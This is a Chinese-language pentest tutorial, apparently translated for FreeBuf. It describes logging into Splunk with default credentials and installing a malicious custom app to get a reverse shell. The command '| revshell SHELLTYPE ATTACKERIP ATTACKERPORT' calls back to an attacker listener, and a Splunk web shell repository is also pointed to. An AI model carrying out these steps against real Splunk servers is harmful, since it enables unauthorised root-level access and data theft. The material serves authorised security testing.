在Splunk上安裝自定義應用反彈Shell的方法
前言
每次測試時我都會碰到Splunk。Splunk是一個用於搜尋,分析和視覺化資料的軟體平臺。通常,Splunk中都會包含著各種資料,其中一些可能是較為敏感的資料。因此,對於滲透測試人員而言它的價值不言而喻。
想要獲得對Splunk的訪問許可權,可以通過猜密碼或重用之前獲取到的密碼嘗試登入。曾經,我有過使用“ admin : admin ”或“ admin : changeme ”登入進入管理控制檯的情況。
Splunk app
有一個技巧我相信很多人都不知道,就是使用Splunk app來執行python程式碼。 ofollow" rel="nofollow,noindex" target="_blank">TBG Security 團隊開發了一款可用於滲透測試的Splunk app。該應用早 在2017年就已經推出 。儘管如此,我覺得還是很少有人知道這個工具,我覺得它應該受到更多人的關注。
工具的使用非常簡單。首先,你只需從Splunk Shells GitHub 頁面下載其最新版本。
登入Splunk管理控制檯後,依次單擊“App”欄和“Manage Apps”。
進入Apps面板後,單擊“Install app from file”。
單擊browse按鈕並上傳tar.gz檔案。
應用成功上傳後,必須重啟Splunk。重啟後登入Splunk,並返回到“Apps”介面。單擊permissions,當你看到“Sharing”選項時,單擊“All Apps”單選按鈕。
安裝app後,最後要做的就是獲取shell。這裡會有一些選項,我選擇的是通過Metasploit建立的標準反向shell。
MSF handler(或netcat listener)啟動並執行後,鍵入以下命令觸發app:
| revshell SHELLTYPE ATTACKERIP ATTACKERPORT
這將立即執行app,並獲取到一個反向shell。
以上測試是在Splunk 7.0上進行的,一切都非常的順利!Splunk通常以root身份執行,這為攻擊者提供了列舉主機其他資訊的機會,而不僅僅是侷限在資料庫範圍。
更新:
除了以上方法,你還可以使用Tevora的 splunk_pentest_app ,更多內容可以 參閱他們釋出的文章 。
再次更新(10/20/2018):
我發現了一個可用的Splunk web shell: https://github.com/f8al/TA-Shell 。
*參考來源: ping-shells-on-splunk/" ref="nofollow" rel="nofollow,noindex" target="_blank">n00py ,FB小編secist編譯,轉載請註明來自FreeBuf.COM